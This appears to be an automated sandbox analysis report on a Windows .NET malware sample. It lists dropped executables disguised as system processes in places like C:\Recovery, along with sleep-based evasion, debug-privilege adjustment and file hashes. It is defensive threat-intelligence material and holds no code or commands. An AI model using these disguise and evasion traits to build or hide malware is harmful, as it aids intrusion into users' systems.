Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\RCX75E9.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RCX6567.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Mt6QkZnVbc.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe TID: 7368	Thread sleep count: 1505 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe TID: 7368	Thread sleep count: 689 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe TID: 5228	Thread sleep count: 368 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe TID: 8048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe TID: 6908	Thread sleep count: 485 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe TID: 8032	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\dwm.exe TID: 7788	Thread sleep count: 369 > 30	Jump to behavior
Source: C:\Recovery\dwm.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\dwm.exe TID: 6940	Thread sleep count: 367 > 30	Jump to behavior
Source: C:\Recovery\dwm.exe TID: 8152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\services.exe TID: 6164	Thread sleep count: 374 > 30
Source: C:\Recovery\services.exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\services.exe TID: 7720	Thread sleep count: 365 > 30
Source: C:\Recovery\services.exe TID: 7136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 7936	Thread sleep count: 462 > 30
Source: C:\Recovery\sihost.exe TID: 7916	Thread sleep count: 199 > 30
Source: C:\Recovery\sihost.exe TID: 7860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 8004	Thread sleep count: 365 > 30
Source: C:\Recovery\sihost.exe TID: 7972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 8120	Thread sleep count: 367 > 30
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 6912	Thread sleep count: 231 > 30
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 916	Thread sleep count: 206 > 30
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 8096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 6424	Thread sleep count: 464 > 30
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 7908	Thread sleep count: 476 > 30
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe TID: 5436	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\dwm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\dwm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\services.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\services.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\dwm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\dwm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\services.exe	Process token adjusted: Debug
Source: C:\Recovery\services.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Process token adjusted: Debug
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Process token adjusted: Debug
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Queries volume information: C:\Users\user\Desktop\Mt6QkZnVbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\dwm.exe	Queries volume information: C:\Recovery\dwm.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\dwm.exe	Queries volume information: C:\Recovery\dwm.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\services.exe	Queries volume information: C:\Recovery\services.exe VolumeInformation
Source: C:\Recovery\services.exe	Queries volume information: C:\Recovery\services.exe VolumeInformation
Source: C:\Recovery\sihost.exe	Queries volume information: C:\Recovery\sihost.exe VolumeInformation
Source: C:\Recovery\sihost.exe	Queries volume information: C:\Recovery\sihost.exe VolumeInformation
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Queries volume information: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe VolumeInformation
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Queries volume information: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe VolumeInformation
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Queries volume information: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe VolumeInformation

Windows Analysis Report Mt6QkZnVbc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted URLs

Windows Analysis Report
Mt6QkZnVbc.exe

Malware Threat Intel
Provided by

ID:	1427111
Product:	CloudBasic
Start time:	02:01:04
Start date:	17.04.2024
Sample:	Mt6QkZnVbc.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	49267a1e4c9cbb955209690e1d82d1d1
SHA1:	47fb7d48398a2049f84c4a68c96ea5ac27513cbe
SHA256:	1fbcb895a6e34fb2a307c0c9896b7922ea723e5eea183fa319c0142c5a761fdf
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\Google\5d095569012eb4	ASCII text, with very long lines (357), with no line terminators	56E419CBA08C4186EA2BED068FFD3C19	505EF64F79588716B3A7FCA13AA9F32E451F493A	9A40FE29DEB1EBC3F1AA61C9930F286F81144167692E24BB3051ACB2F938D638
C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Program Files (x86)\Google\RCX75E9.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	A413419A271A45957F60706C5D2D58F4	94F94C3989D2E4C8BB4F3378E39886FD6C9A78AD	77C2678F7E6868BA36DC19FFC6FC4928AB9BAB272F2B149CB244671919E4FDF8
C:\Program Files (x86)\Windows Mail\5d095569012eb4	ASCII text, with very long lines (594), with no line terminators	498973B5B3DB19262AE38E13D387E00E	E7CF773EC5EDEE078EDCA2D035B98535EB656DFE	D9161565718DD56762174F5A42CF07B0E8D55E9AC62FE95BF1CB9701696A2430
C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Program Files (x86)\Windows Mail\RCX69BF.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2B82EED2D3F1990B19CAD20B9CB5A901	953D41CF14F9E62F5922F7A7CDEA2DE186F19D3B	1A618255B4CD578926086F84970BBF81188A5559AAE09F796DA52F9EBA0D7EF8
C:\Program Files (x86)\google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe (copy)	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	A413419A271A45957F60706C5D2D58F4	94F94C3989D2E4C8BB4F3378E39886FD6C9A78AD	77C2678F7E6868BA36DC19FFC6FC4928AB9BAB272F2B149CB244671919E4FDF8
C:\Program Files (x86)\windows mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe (copy)	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	2B82EED2D3F1990B19CAD20B9CB5A901	953D41CF14F9E62F5922F7A7CDEA2DE186F19D3B	1A618255B4CD578926086F84970BBF81188A5559AAE09F796DA52F9EBA0D7EF8
C:\Program Files\Windows Portable Devices\5d095569012eb4	ASCII text, with no line terminators	9843ED87AC8419FB7C21A882B37F10F2	AC022DA5082A2D27DD5868BD7AFA22B45429F50B	70F818F9DEF1C845BB74D0D22E8FB2DC8104B05FE644054B705353D87130695F
C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Program Files\Windows Portable Devices\RCX7115.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C2DEB277ADE971F7E24DDACC00A96814	BB8069363F12957300DBBE23823A55ADDABF2D83	DF625F4E6EDC71F368ACE3948CBC605D91795C6AA262977264856A83F555DE91
C:\Recovery\66fc9ff0ee96c2	ASCII text, with very long lines (672), with no line terminators	002A5F805108F7E5806B1BAC0FCD25FA	ACD9BED179AED05F7D35D972A19C15B7040AB837	77680DA91F7C85BB8310D48DFF6C14344D4F6A0759040E4CB96EAA5C504486F0
C:\Recovery\6cb0b6c459d5d3	ASCII text, with very long lines (717), with no line terminators	E5A5D71369504D85B3417AF97F14F762	1B7E2029303C1753A31C21D9D7F2A6B52A203BEF	0E6B4C4D2EC2E9C1C60C1FE2A17158180A735F8126F1E60A900BBBE355D22F10
C:\Recovery\RCX67AA.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	57BA17330684FF20862AEA6D2FA7FDB7	898E48F9B32FCF2F68B0FF9C76D91417C84F8DF2	D80B2C68CE3A55DF46B72D7AD1F8E8C82E2FF1A69913D810346F66241E293064
C:\Recovery\RCX6C11.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	99A4D8504AA239EC8A2AE5FEDDA79F16	E7388F99A9B5FC7EA59FC4559403443697C44318	E774624BF4B90A4AC081DC711C3CF0ED5C0CB052999ADE9D36D0D70705BAC561
C:\Recovery\RCX786B.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F2242C5503CE271DA7BA13CD05477D13	FB624A471CB27C7CD817DED93EEE33F473139E42	59B068E5CE6FD816368004EE174EB141BA30662EE1CC18909893C59B37AB7C58
C:\Recovery\c5b4cb5e9653cc	ASCII text, with very long lines (312), with no line terminators	CD76D1951A263801852FB44857920135	8E31A9F2E46AAB377A145ACA0AA3719AD1F3B160	899319A5F5E097C7C0CB688289B101ACCDC65E61E39AA2EAB759F414B86A1734
C:\Recovery\dwm.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Recovery\dwm.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Recovery\services.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Recovery\services.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Recovery\sihost.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Recovery\sihost.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mt6QkZnVbc.exe.log	ASCII text, with CRLF line terminators	FE86BB9E3E84E6086797C4D5A9C909F2	14605A3EA146BAB4EE536375A445B0214CD40A97	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UserOOBEBroker.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log	CSV text	12C61586CD59AA6F2A21DF30501F71BD	E6B279DC134544867C868E3FF3C267A06CE340C7	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
C:\Users\user\AppData\Local\Temp\59a07570a8a8386aa1a299e6ab573f686e7e81544.5.321e942f7529053d3bf5a939edfacdca5e36682859	ASCII text, with very long lines (644), with no line terminators	03780022AB1955AD3BD0BF6648AC36F0	713F8776409E1D08E33AC411576F44FE31ED0C93	A805EDFE2C7E018F733374EF43A8DD5ADB985F2B40DBADD77258B0898387B592
C:\Users\user\Desktop\Mt6QkZnVbc.exe (copy)	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	B28AA7EA383E0161ECBE6B73392B0BF1	38EC3EE65ECD219F03DFCBEE5F1F9F66F81DA5DE	014C8663D769AC46B9B278A4D848BBBE492A68E45489E9347BB7116D4E61FEA2
C:\Users\user\Desktop\RCX6567.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	B28AA7EA383E0161ECBE6B73392B0BF1	38EC3EE65ECD219F03DFCBEE5F1F9F66F81DA5DE	014C8663D769AC46B9B278A4D848BBBE492A68E45489E9347BB7116D4E61FEA2
C:\Windows\SKB\LanguageModels\5d095569012eb4	ASCII text, with very long lines (735), with no line terminators	FBC4EF3BA7829B0B53A3ABB9244676BE	52994EC7C651A89515E58EE5AA47C64D4AF92A63	06B11255B3971004FF5AFCFA133F96968C0DD6812F4B9333AC89758D22B74261
C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Windows\SKB\LanguageModels\RCX6E93.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	FD8AA1D006F5C3DD7CA7FB2CFF1809AE	B3D94AC35E1E677A95535F22EAA3D05A1AA071E2	2BF870777E0388EF47F0F95432E45844909FAE275A965C992343E096A48537E4
C:\Windows\ServiceProfiles\LocalService\Desktop\7ccfebd9e92364	ASCII text, with no line terminators	ECC07294D8D55E4F95C863C0664CBC94	78ACFA862BCFEE81137AA78648B58DD0978703E0	150578794EFD7E7CCF27CAE970E94C8F323EC49C930D54CF7715202B1422E784
C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	7B0F077F45AE0E9A6BEF0B806BBB185F	377A6BD6DBFE41909C7A52FFCE7F77580F7AAF59	68C8E0243226EEB82DAFA9E34758372BD7D82078A969D292123F9144BA4B6B37
C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	49267A1E4C9CBB955209690E1D82D1D1	47FB7D48398A2049F84C4A68C96EA5AC27513CBE	1FBCB895A6E34FB2A307C0C9896B7922EA723E5EEA183FA319C0142C5A761FDF
C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309